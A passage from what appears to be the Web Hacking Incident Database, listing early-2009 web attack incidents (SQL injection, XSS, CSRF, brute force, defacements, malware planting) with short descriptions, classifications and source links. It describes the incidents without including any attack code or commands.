However, if the site is also vulnerable to CSRF, the XSS payload can carry, in addition to its own effect, the original XSS-injecting request, executed under the attacked user's credentials. This modifies his content and therefore hits his own friends, who hit their own friends, and so on.

You can find the technical details of the attack on Damon Cortesi's blog. You may also be interested in the full XSS payload.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://dcortesi.com/2009/04/11/twitter-stalkdaily-worm-postmortem/
Attack Source Geography: USA
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-36: Hackers steal Austalian and NZ Shell customer info (Updated)
WHID ID: 2009-36
Date Occured: 2/17/2009
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography:
Incident Description:

Update (Apr 19th 2009) - (Presumably) the hacker posted a comment to this story with some details. He says that the Number_of_Records leaking was much higher: 17,000 Aussies and 7,000 Kiwis. The rest we did not understand and hope that either he or any of you can clarify.



Leakage of information from an energy company is usually associated with gas station fraud, such as installing a stealth credit card reader at the pump. However, a report suggests that an incident in which information about 4500 Australians and 1400 Kiwis leaked was the result of a glitch in a web based application for applying for a Shell fuel card. The information obtained included company names, address details, email addresses and some bank account details.
Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.stuff.co.nz/national/2269256/Hackers-steal-Shell-customer-info
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records: 5900
Additional Link:
Entry Title: WHID 2009-35: Former US Senator Donors Information Leaks
WHID ID: 2009-35
Date Occured: 3/11/2009
Attack Method: Administration Error
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Politics
Attacked Entity Geography: USA
Incident Description:

Norm Coleman, a former senator from Minnesota, is going through a legal battle to try to win back his seat in the senate. If the way he manages his web site security and the crises it created are an indicator, I am not sure that he has a place there.

The Coleman team called in the US Secret Service to investigate the leak in which sensitive information about more than 4700 donors was published on Wikileaks, a web site devoted to such exposures. Coleman himself called the incident "an obviously an attack on my campaign".

However, the Minnesota Independent reveals that the information was exposed for anyone to view on the senator's web site since at least January 28th. Hardly an attack. At the time the site was suffering performance issues, and in a debate about the cause somebody commented to the Independent about an exposed database, which the Independent was fast to report on. Moreover, Wikileaks took the trouble to inform the people on the list that their information had leaked, while it took the Senator's team over a month to react.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://minnesotaindependent.com/28711/breaking-colemans-unsecured-donorbase-to-be-revealed-on-wikileaks
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records: 4700
Additional Link:
Entry Title: WHID 2009-34: Romanian Hacker Moves On To The Telegraph
WHID ID: 2009-34
Date Occured: 3/6/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Media
Attacked Entity Geography: UK
Incident Description:

Another week, another hack by the HackerBlog, and when it targets an important web site and the impact is severe it is worthy of WHID. This time the Romanian hacker used blind SQL injection to penetrate the web site of the Telegraph, a leading English daily paper.

Among his findings is a table including 700,000 e-mails, which would be a gold mine for spammers.

The Telegraph's response was published on their official blog.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: http://www.hackersblog.org/2009/03/06/telegraphcouk-hacked-sql-injection/
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-33: eBay Fraud Abuses Zero Day XSS
WHID ID: 2009-33
Date Occured: 3/4/2009
Attack Method: Content Spoofing
Application Weakness: Improper Output Handling
Outcome: Monetary Loss
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

A zero day XSS vector enables hackers to include arbitrary code in an eBay offer, which is executed by both Firefox and IE. As a result they were able to spoof the content of the offer, so that the user saw different information than the details known to eBay.

A very detailed technical explanation of the vulnerability is included in a Firefox community discussion on whether the issue is a browser or a web site issue. As usual, the truth is somewhere in the middle. The Firefox team chose to correct the issue discovered in Firefox. Microsoft claimed that the issue exploited in IE, which is reported to be a CSS expression issue, is a feature and not a bug, and that the vulnerable web site should be fixed.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=481558
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-32: 750 Twitter Accounts Hacked
WHID ID: 2009-32
Date Occured: 3/10/2009
Attack Method: Brute Force
Application Weakness: Insufficient Anti-automation
Outcome: Link Spam
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description:

Twitter reports in a blog entry that 750 accounts were hacked. The hacker posted messages linking to a porn webcam. While Twitter did not disclose how the attack was carried out, the suggested remediation hints that the account passwords were guessed, probably using a brute force attack.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked: Password
Number of Records: 750
Additional Link:
Entry Title: WHID 2009-31: Double Clickjacking Worm on Twitter
WHID ID: 2009-31
Date Occured: 2/12/2009
Attack Method: Worm
Application Weakness: Insufficient Process Validation
Outcome: Defacement
Attacked Entity Field: Web 2.0
Attacked Entity Geography: US
Incident Description:

Twitter is certainly bypassing Facebook as the most popular site out there, at least when it comes to security incidents. This time somebody decided to abuse Twitter to demonstrate Clickjacking, an attack that RSnake and Jeremiah Grossman re-christened at the OWASP conference in New York in September.

A well placed button labeled "don't click" made people click on it, actually sending a Twitter message. Sunlight Labs has a very interesting report showing the rate of propagation of the worm.

CNet reports the worm spread on Feb 12th in two pulses. After the Twitter people closed the loophole the 1st time, somebody bypassed the patch to restart the worm's spread.

Chris Shiflett provides a very good technical analysis of the worm.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-30: Sage SaaS Withdrawn Due to Security Flaws
WHID ID: 2009-30
Date Occured: 1/21/2009
Attack Method: Insufficient Authentication
Application Weakness: Insufficient Authentication
Outcome: Monetary Loss
Attacked Entity Field: Technology
Attacked Entity Geography: UK
Incident Description:

While we have no public record of an exploit in this case, it seems that the mere discovery of vulnerabilities in Sage's new SaaS (software as a service) offering created enough damage to classify it as an incident.

Sage is the leading provider of accounting software in the UK, and it was about to launch a trendy small business SaaS offering. However, as ZDnet reports, serious security flaws were discovered in the public beta and the company had to call off the launch. Who discovered the issues? Naturally, the competition. Duane Jackson, the CEO of a tiny rival company, reported them on his blog.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: Sage
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-29: FBI & Secret Service warn of a sophisticated HSM attack
WHID ID: 2009-29
Date Occured: 2/25/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Monetary Loss
Attacked Entity Field: Finance
Attacked Entity Geography: USA
Incident Description:

A very interesting report by the FBI together with the US Secret Service outlines a scheme exploiting SQL injection to steal credit card information from financial institutions. The attack involves directly attacking HSMs, the banks' key vaults in charge of verifying ATM PINs, in order to brute force PINs.

The report is unique in describing an attack on financial services. Such attacks are known to happen but are seldom reported, certainly not with the amount of detail in this report. However, the report does not indicate which incident it is based on. Is the close proximity of the report's release to the Heartland incident just a coincidence?

Getting to this report took some effort, and the only non-blogosphere copy we found is on the Visa web site. If you know anything about this incident, please help us complete the information by leaving a comment or contacting us.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link: http://usa.visa.com/download/merchants/20090212-usss_fbi_advisory.pdf
Entry Title: WHID 2009-28: Serious Leakage on Mac clone Maker's site
WHID ID: 2009-28
Date Occured: 2/11/2009
Attack Method: Misconfiguration
Application Weakness: Application Misconfiguration
Outcome: Leakage of Information
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

The Register reports that the online shop of Psystar, a maker of Mac compatible equipment, is heavily leaking technical information that can be exploited to hack the site.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-27: Panasonic Products for Cheap
WHID ID: 2009-27
Date Occured: 2/14/2009
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Monetary Loss
Attacked Entity Field: Retail
Attacked Entity Geography: UK
Incident Description:

A report suggests that the UK retail site of the electronic equipment giant Panasonic was hacked and prices of products were set to pennies. Since the incident followed a layoff of 15,000 employees, it is assumed to be a disgruntled employee's doing.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-26: F-Secure Joins The Breached AV Vendors Club
WHID ID: 2009-26
Date Occured: 2/11/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Technology
Attacked Entity Geography: Finland
Incident Description:

It wasn't surprising that after attacking the Kaspersky and BitDefender web sites, Uno, the Romanian hacker, would continue to strike anti-virus vendors. This time he found a vulnerability in the web site of Finnish AV vendor F-Secure. Somewhat less severe than the others, the vulnerability enabled the hacker only to access virus statistics.

As usual, the marketing department response is amazing, mentioning that "the problem with its site was due to a bug in a Web application and not related to an unpatched system". Does that make it better?

Frankly, I don't envy the marketing department's role. The company, any company for that matter, is spending too little on web application security, sites are taken down daily, and the marketing people are sent to fend off the public. They must have a thick skin to survive in marketing.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-25: Zone-H defaced
WHID ID: 2009-25
Date Occured: 2/13/2009
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Defacement
Attacked Entity Field: Media
Attacked Entity Geography:
Incident Description:

Zone-H Defaced

Whenever a defacement appears in WHID we need to explain why. After all, isn't Zone-H a better repository of simple defacements? Well, yes, but according to this report by The Register, this time it was Zone-H which was defaced. The defaced site, seen on the right, is available here. I am sure it is just a matter of time before we add a WHID defacement to WHID...

The Register article is interesting due to another perspective: when discussing the future of Zone-H, John Leyden writes:

But in an age where SQL injection assaults against legitimate sites are used to run drive-by download attacks without leaving any obvious signs of attack, perhaps the recording of blatant web graffiti attacks is no longer as relevant as it once was

We at the Web Hacking Incident Database try to provide the answer for this new age. I hope we help.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-24: New Phishing Attacks Combine Wildcard DNS and XSS
WHID ID: 2009-24
Date Occured: 2/10/2009
Attack Method: DNS Hijacking
Application Weakness: Improper Output Handling
Outcome: Phishing
Attacked Entity Field: Various
Attacked Entity Geography: Various
Incident Description:

Netcraft, one of the leading authorities on phishing research, reports a phishing scam that involves XSS.

The scam exploits an XSS vulnerability in iRedirector, software used to map sub-domains onto paths on the site, in order to hijack domains and use them as phishing targets. Since iRedirector enables virtually any sub-domain to be defined, the attacker can now create an endless number of combinations of domain names built to fool users and web filters alike.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: iRedirector
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-23: Miley Cyrus Twitter Account Hit By Sex-Obsessed Hacker
WHID ID: 2009-23
Date Occured: 2/17/2009
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description:

It is Twitter again, it is a celebrity again. Why don't they keep their passwords to themselves? This incident is even uglier, as the attacker posted obscene content on the Twitter account of the 16-year-old actress Miley Cyrus. This is not the first attack targeting Miley Cyrus. As reported by WHID, her personal Gmail account was hacked last year and personal pictures were stolen and published online.

We assume that he just guessed the password. Was it a trivial one? Did he find a way to brute force it? Or was it something entirely different, like yet another Twitter CSRF bug? Time will tell.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-22: Federal Travel Booking Site Spreads Malware (Updated)
WHID ID: 2009-22
Date Occured: 2/11/2009
Attack Method: Insufficient Authentication
Application Weakness: Insufficient Authentication
Outcome: Planting of Malware
Attacked Entity Field: Retail
Attacked Entity Geography: USA
Incident Description:

Updated (Feb 22nd 2009) - the Washington Post updates that the hack exploited a problem with the default configuration of the authentication module used for authenticating remote administrators. As a result we categorized this incident under "insufficient authentication" and "misconfiguration".


Whenever we include a site inflicted with malware in WHID we need to explain why this one is worthy of WHID, given that hundreds of thousands of web sites are planted with malware annually.

The Washington Post report about govtrip.com spreading malware is unique because this is an official US General Services Administration (GSA) web site and many US federal department employees are required to reserve travel through it. In addition, the site is run by a major defense contractor, Northrop Grumman, who you would think would know better. How secure are their defense projects when it comes to application security?


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-21: This Time Uno is after the Herald Tribute
WHID ID: 2009-21
Date Occured: 2/17/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description:

I must admit that Uno, the Romanian hacker behind a series of intrusions in recent days, is a bit of a cheat for the Web Hacking Incident Database. We usually do not report vulnerabilities that were not exploited. While we understand their importance, they do not fall under the criteria set for WHID. For now we list them in a separate page, waiting for a place to be filed in.

Uno presents a dilemma: he finds a vulnerability, exploits it to a limit and publishes the results. Therefore the incident does not have a sizable outcome and no damage is done, but nevertheless it is interesting. We are not the only ones to note that. Kaspersky stressed the point that no data was actually compromised in their response to the event. So should we add it to WHID as an incident? Should we skip it as just a vulnerability? For now we put them in.

So what is Uno's mischief this time? This time it is the International Herald Tribune Uno is after. The impact of this attack, if carried out by a malicious hacker, might have been profound, as it seems that Uno got access to user names and passwords of editors and contributors, possibly enabling a malicious hacker to publish information on their behalf in this very prestigious newspaper.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-20: BitDefender joins Kasperski on the Breached side
WHID ID: 2009-20
Date Occured: 2/9/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Technology
Attacked Entity Geography:
Incident Description:

Uno, the Romanian hacker responsible for penetrating the Kaspersky web site, reported repeating the trick on the web site of the Polish distributor of BitDefender, another anti-virus software vendor.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-19: Kaspersky site breached using SQL injection, sensitive data exposed (Updated)
WHID ID: 2008-19
Date Occured: 2/7/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Technology
Attacked Entity Geography:
Incident Description:

Update (Feb 22nd 2009) - We were probably not the only ones not satisfied with Kaspersky's official press release on the subject. An interesting report on the Kaspersky viruslist blog by a person on the investigating team provides answers: the data was not secured well, nor was the hacker incapable. The hacker made a mistake in his attack vector and decided to pursue it no further. The data was available to any hacker who was really after it.

I must take my hat off to Kaspersky for this frank analysis, which is very uncommon for companies who were breached and can really help to highlight the importance of application security.


Update (Feb 13th 2009) - Kaspersky hired David Litchfield, a well known database security expert, to analyze the incident. In their response, Kaspersky points out that no sensitive data was actually compromised in the event. The report points out that the hacker and others following his hints did try to access sensitive data but did not succeed. The carefully worded report does leave many questions open:

  • Was the data secured well, or were the hackers who tried to access it just not capable?
  • Was no data vulnerable or just "sensitive data" and if so what is the data that was exposed?
  • Did the investigation go back to check that no one hacked the system prior to the published incident, potentially abusing it and avoiding publication?

A researcher found and exploited a serious SQL injection vulnerability in the US web site of Kaspersky, an anti-virus software vendor, exposing the full customer database. Well, the full database actually, as the list of tables exposed proves. Apparently, the vulnerability existed for some time and the researcher informed Kaspersky about it, to no avail, before making it public.

This is another example of how fatal SQL injection is. SQL injection is considered one of the better understood attack vectors, easy to find during a security review, and therefore easy to get rid of. However, one of its variants, blind SQL injection, can appear anywhere in the application, not just in key pages managing sensitive information, and still expose the entire database, making reviewing and fixing the application much harder.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Romania
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-18: phpBB web site hacked using LFI
WHID ID: 2009-18
Date Occured: 2/1/2009
Attack Method: Local File Inclusion (LFI)
Application Weakness: Improper Input Handling
Outcome: Leakage of Information
Attacked Entity Field: Technology
Attacked Entity Geography:
Incident Description:

phpBB was known for years as one of the most insecure software packages out there. It is responsible for one of the first application-layer worms, Santy, back in 2004. How ironic it is that its own web site was seriously breached due to a vulnerability in another software package it used...

The culprit was an LFI (Local File Inclusion) vulnerability in PHPlist, an application for managing newsletters, which enabled the hacker to grab the phpBB user list. Another researcher claims that this is not an LFI but a super-globals overwrite, which is still used to include files.

However, phpBB is not entirely off the hook, as the phpBB team admits. The stolen files included only hashed passwords; however, the phpBB 2 hash was unsalted and the hackers successfully brute forced 28,000 passwords. While phpBB 3, which is used on the phpBB site, uses better password hashing, the upgrade procedure did not upgrade existing users' hashes, waiting for their first login to do so. Anyone who did not log in to the web site since the upgrade still had a weakly hashed password in the database.

A very detailed report of the incident by the hacker sheds light on how such hacks are carried out, including what the hacker went after and his exploitation techniques. The hacker found the exploit on milw0rm, a well known exploit repository, showing that public disclosure of vulnerabilities has its price, especially when it precedes the release of the patch.

A copy of the report in case the original disappears can be found here.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked: Password
Number of Records: 28000
Additional Link:
Entry Title: WHID 2009-17: Passwords are optional at SpeedDate
WHID ID: 2009-17
Date Occured: 2/3/2009
Attack Method: Insufficient Authentication
Application Weakness: Insufficient Authentication
Outcome: Leakage of Information
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description:

TechCrunch reports that for a short period of time, SpeedDate, an online dating service, did not require a password. If you knew someone's user name you could log in. Talk about "lack of sufficient authentication controls..."


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-16: Primary schools hit by smut hack
WHID ID: 2009-16
Date Occured: 1/30/2009
Attack Method: Known Vulnerability
Application Weakness: Application Misconfiguration
Outcome: Defacement
Attacked Entity Field: Education
Attacked Entity Geography: UK
Incident Description:

Not all defacements are created equal. I have a second grader who has just started to use her school's web site, so this defacement of 20 primary school web sites with porn hit me deep inside. We do so much to screen our young ones from the sleazy world outside, and getting it on the school's web site is just unimaginable. Just think about the questions I would be asked if my daughter got such pages.

The incident also highlights the total breakdown of cyber security. The incident is blamed on an unpatched version of Moodle, an open source on-line education software package. The naive way of thinking would be that schools don't have the budgets to protect their applications or even to upgrade them. However, as this incident shows, proper security is fundamental and a substantial part of the budget should be allocated to it, even if it means we spend less on application features. We need to move slower but ensure security. After all, what is the value of an educational system that shows porn?

Another insight is that real time controls for protecting web applications are essential. You need a WAF. While the specific vulnerability exploited is unknown, installing ModSecurity would probably have prevented the exploit.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology: Moodle
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-15: Kanye West has been Hacked
WHID ID: 2009-15
Date Occured: 1/23/2009
Attack Method: Insufficient Authentication
Application Weakness: Insufficient Authentication
Outcome: Disinformation
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description:

Hacking of celebrities' web presence is topping the 2009 incident list, and rappers seem to lead. However, this report in the Ampersand, like the Lil Kim story from the same week, is somewhat questionable. In both cases it seems that uncomfortable content was blamed on hacking.

West's story is somewhat ironic as he used his blog to remind users of the untruthfulness of his web presence.

When reviewing all the rapper incidents, my conclusion is that they are more susceptible to content spoofing because it is much easier for hackers to imitate their language and style.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-14: My.BarackObama.com Infects Visitors With Trojan
WHID ID: 2008-14
Date Occured: 1/27/2009
Attack Method: Content Spoofing
Application Weakness: Improper Output Handling
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography: USA
Incident Description:

Websense reports that my.barackobama.com, an open blogging service which is part of Obama's campaign web site, has been used to point users to malware-infecting content.

The scam is a good example of the dangers of Web 2.0 user generated content and mashups. There was no malicious code on Obama's site; however, permitted HTML code that looked like an embedded YouTube clip pointed to an external site which carried the malware.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-13: Wikipedia Biography Hacking
WHID ID: 2009-13
Date Occured: 1/27/2009
Attack Method: Content Spoofing
Application Weakness: Unknown
Outcome: Disinformation
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description:

This incident might not have gotten into the Web Hacking Incident Database a year ago. However, a heated discussion on the Web Application Security Consortium threat classification project reminded me that content spoofing is a potent attack vector by itself, actually one of the most dangerous there is.

A wiki is one of those platforms that by design allow content to be changed. That is its philosophy, and Wikipedia is the premier wiki out there. It is not a surprise that it is a prime target for content spoofing, as the story about the unexpected demise of two US senators during Obama's inauguration shows.

You can read more about the unique security philosophy of Wikis in my recent article and presentation about the subject.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-12: Embassy of India in Spain found serving remote malware through iFrame attack
WHID ID: 2009-12
Date Occured: 1/26/2009
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography:
Incident Description:

Ismael Valenzuela sent us a story about yet another site serving malware through an iFrame. This time it is an official one, belonging to the Indian government's official branch in Spain: its embassy.

We can hardly include every malware-serving site in WHID; after all there are hundreds of thousands, if not millions, of those. Why pick on the Indian embassy in Spain? One good reason is that we finally got input from a reader and wanted to honor the event by including the incident. But there is another, more important reason.

First, hacked embassy sites are becoming a major issue, which points to a much larger one: cyber crime is endangering the Internet as we know it. While we have come to rely on the web to provide us with all the information and services that we need, we do not have the tools to make it a safe place, and embassy web sites are a good example.

Practically the only way to provide sufficient security to a web site is not to have one in the first place. Instead, small organizations must rely on the services of huge brokers, such as Amazon, eBay or Google Sites. However, not everyone can use these services. Embassies are a good example, as they need to be "doubly localized" for both the originating and target countries, which makes it nearly impossible to create a uniform service for them. Therefore even embassies of larger countries need to create small, home-made and insecure web sites, as they need to adjust their site content, language and look to the local community served.

Technical analysis of the planted malware was done by Trend Micro.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-11: Lil Kim Facebook Hacked
WHID ID: 2009-11
Date Occured: 1/26/2009
Attack Method: Unknown
Application Weakness: Unknown
Outcome: Disinformation
Attacked Entity Field: Entertainment
Attacked Entity Geography: USA
Incident Description:

I am not sure why rappers' web presence is so often hacked. They might be the first generation of artists to use the web, brightly combining great Internet skills with technophobia, which leads to basic operational errors. Or it might be the underground nature of the artists that (mis)manage their web presence by themselves.

Lil Kim is joining Soulja Boy in being cyber abused, or so she claims, saying that a blog entry calling Naturi Naughton, the actress who portrays her in a new film, "tasteless and talentless", is a fake.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-10: MacRumorsLive feed hack
WHID ID: 2009-10
Date Occured: 1/7/2009
Attack Method: Unintentional Information Disclosure
Application Weakness: Application Misconfiguration
Outcome: Disinformation
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description:

It seems that the worst thing that can happen to hackers is a real accident befalling Apple's CEO Steve Jobs. The number of hacks devoted to informing us about his fictitious accidents is just overwhelming. In this case AnantaSec reports a hack into the Mac Rumors feed that was possible simply because a file with the administrator password was lying around, accessible to anyone due to an administration error.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-9: MetaFilter suffers an SQL injection attack
WHID ID: 2009-9
Date Occured: 1/24/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description:

MetaFilter's philosophy is that social norms and peer pressure, referred to as "self-policing", will ensure the quality of the site's content. However, it seems that this philosophy does not extend to hackers who abuse the site's software to plant malware affecting MetaFilter users.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-8: Wired.com Image Viewer Hacked to Create Phony Steve Jobs Health Story
WHID ID: 2009-8
Date Occured: 1/22/2009
Attack Method: Content Spoofing
Application Weakness: Application Misconfiguration
Outcome: Disinformation
Attacked Entity Field: Media
Attacked Entity Geography: USA
Incident Description:

John Abell from Wired magazine often writes about Apple's CEO's health. However, this report about Jobs suffering a cardiac arrest was neither his nor true. The culprit was Wired's public image viewing utility, which lets people upload an image and then presents the image as part of the Wired web site, banner and domain included.

This is a wonderful example of a web application design flaw. There was nothing wrong with the code, however the design of the feature enabled it to be abused.

Further information:


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-7: China's Yeepay.com Suffers Internet Payment Hacker Attack
WHID ID: 2009-7
Date Occured: 1/19/2009
Attack Method: Denial of Service
Application Weakness: Insufficient Anti-automation
Outcome: Downtime
Attacked Entity Field: Finance
Attacked Entity Geography: China
Incident Description:

China Retail News reports that Yeepay, a Chinese online payments provider, suffered a major denial of service attack. The story seems to be big in China, but hardly made it to the west.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-6: InfoGov switch hosting due to lack of security
WHID ID: 2009-6
Date Occured: 1/16/2009
Attack Method: SQL Injection
Application Weakness: Improper Input Handling
Outcome: Planting of Malware
Attacked Entity Field: Government
Attacked Entity Geography: UK
Incident Description:

This gem is taken out of a press release issued by a hosting provider. According to the press release, InfoGov, a UK provider of risk management solutions, switched hosting of its sites to a new provider because the previous one did not provide an adequate solution to an SQL injection attack that penetrated the site and inflicted malware on InfoGov customers.

Probably yet another fallout from the ongoing Asprox attack, this incident is interesting as it emphasises the responsibility that customers expect service providers to take in protecting them from web based attacks.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-5: School data hacked, grades altered
WHID ID: 2009-5
Date Occured: 1/15/2009
Attack Method: Insufficient Authentication
Application Weakness: Insufficient Authentication
Outcome: Disinformation
Attacked Entity Field: Education
Attacked Entity Geography: USA
Incident Description:

This story about a student hacking a Pottsville, PA school's online system and changing grades demonstrates again that password stealing is by far the most common method by which web sites are hacked.

While it is usually not considered a vulnerability in the application itself, I think that applications that expose administrative or high-privilege interfaces to the web should include authentication beyond a simple password. A school grading system is one example. The Twitter administrative interface hacked last week is another example.


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography:
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-4: Twitter Personal Info CSRF
WHID ID: 2009-4
Date Occured: 1/7/2009
Attack Method: Cross Site Request Forgery (CSRF)
Application Weakness: Insufficient Process Validation
Outcome: Leakage of Information
Attacked Entity Field: Web 2.0
Attacked Entity Geography: USA
Incident Description:

Gareth Heyes (and others) reported an interesting vulnerability in Twitter last week. While his post included proof-of-concept code, it does not qualify as a hack, only as a vulnerability disclosure, and the Web Hacking Incident Database does not list vulnerabilities.

Luckily, Cool Giorgio Maone decided to create his own proof of concept, run it himself and provide us with the result, enabling me to label this as a hack.

By exploiting a CSRF bug in Twitter (or maybe a feature?), site owners can get the Twitter profiles of their visitors. For Twitter this is the second incident this year, and Twitter incidents now comprise 50% of the web incidents for 2009. Is this going to be the year of Web 2.0 security?


Mass Attack: No
Mass Attack Name:
Number of Sites Affected:
Reference:
Attack Source Geography: Italy
Attacked System Technology:
Cost:
Items Leaked:
Number of Records:
Additional Link:
Entry Title: WHID 2009-3: Google Trends Falls Victim to a Stunt
WHID ID: 2009-3
Date Occured: 1/6/2009
Attack Method: Process Automation
Application Weakness: Insufficient Anti-automation
Outcome: Disinformation
Attacked Entity Field: Internet
Attacked Entity Geography: USA
Incident Description:

